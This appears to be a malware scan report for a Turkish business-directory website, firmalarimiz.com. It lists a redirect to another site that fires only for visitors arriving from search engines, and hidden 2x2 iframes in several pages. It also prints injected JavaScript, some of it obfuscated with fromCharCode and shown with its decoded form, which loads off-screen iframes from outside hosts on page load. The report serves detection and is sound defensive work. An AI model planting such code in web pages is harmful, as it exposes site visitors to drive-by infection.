Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://firmalarimiz.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: firmalarimiz.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 01 Sep 2014 17:28:20 GMT Location: http://effervescence-records.com/hhwd.html?h=505913 Server: Apache/2 Content-Length: 303 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://firmalarimiz.com/ | 200 OK Content-Length: 81670 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://effervescence-records.com/hhwd.html?i=505913 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://effervescence-records.com/hhwd.html?i=505913> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js | 200 OK Content-Length: 91342 Content-Type: text/javascript | clean |
http://firmalarimiz.com/easySlider1.5.js | 200 OK Content-Length: 4755 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.easySlider = function(options){ var defaults = { prevId: 'prevBtn', prevText: 'Previous', nextId: 'nextBtn', nextText: 'Next', controlsShow: true, controlsBefore: '', controlsAfter: '', controlsFade: true, firstId: 'firstBtn', firstText: 'First', firstShow: false, lastId: 'lastBtn', lastText: 'Last', lastShow: false, vertica $("a","#"+options.firstId).hide(); }; }); }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://effervescence-records.com/hhwd.html?i=505913></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> Hidden iFrame found. size: 2x2 src: http://effervescence-records.com/hhwd.html?i=505913 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://effervescence-records.com/hhwd.html?i=505913> | ||
http://firmalarimiz.com/lib/jquery.jcarousel.min.js | 200 OK Content-Length: 17146 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://firmalarimiz.com/js/changimages.js | 200 OK Content-Length: 5197 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://firmalarimiz.com/index.html | 200 OK Content-Length: 81670 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://effervescence-records.com/hhwd.html?i=505913 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://effervescence-records.com/hhwd.html?i=505913> | ||
http://firmalarimiz.com/blog/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 01 Sep 2014 17:28:24 GMT Location: http://www.firmalarimiz.com/blog/ Server: Apache/2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.firmalarimiz.com/blog/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://www.firmalarimiz.com/blog/ | 200 OK Content-Length: 14011 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;} if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105 if(x&&f&&012===10)e(s); Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://www.firmalarimiz.com/blog/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2 | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://www.firmalarimiz.com/blog/wp-content/themes/ribbons/js/sliding_effect.js?ver=3.2.1 | 200 OK Content-Length: 1068 Content-Type: application/javascript | clean |
http://www.firmalarimiz.com/blog/wp-content/themes/ribbons/js/superfish.js?ver=3.2.1 | 200 OK Content-Length: 3712 Content-Type: application/javascript | clean |
http://firmalarimiz.com//s7.addthis.com/js/250/addthis_widget.js/ | 404 Not Found Content-Length: 425 Content-Type: text/html | clean |
http://firmalarimiz.com/test404page.js | 404 Not Found Content-Length: 399 Content-Type: text/html | clean |
http://firmalarimiz.com/hakkimizda.html | 200 OK Content-Length: 31575 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://effervescence-records.com/hhwd.html?i=505913 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://effervescence-records.com/hhwd.html?i=505913> | ||
http://firmalarimiz.com/sehirler.html | 200 OK Content-Length: 75648 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://effervescence-records.com/hhwd.html?i=505913 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://effervescence-records.com/hhwd.html?i=505913> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=firmalarimiz.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://firmalarimiz.com/
Result: firmalarimiz.com is not infected or malware details are not published yet.
Result: firmalarimiz.com is not infected or malware details are not published yet.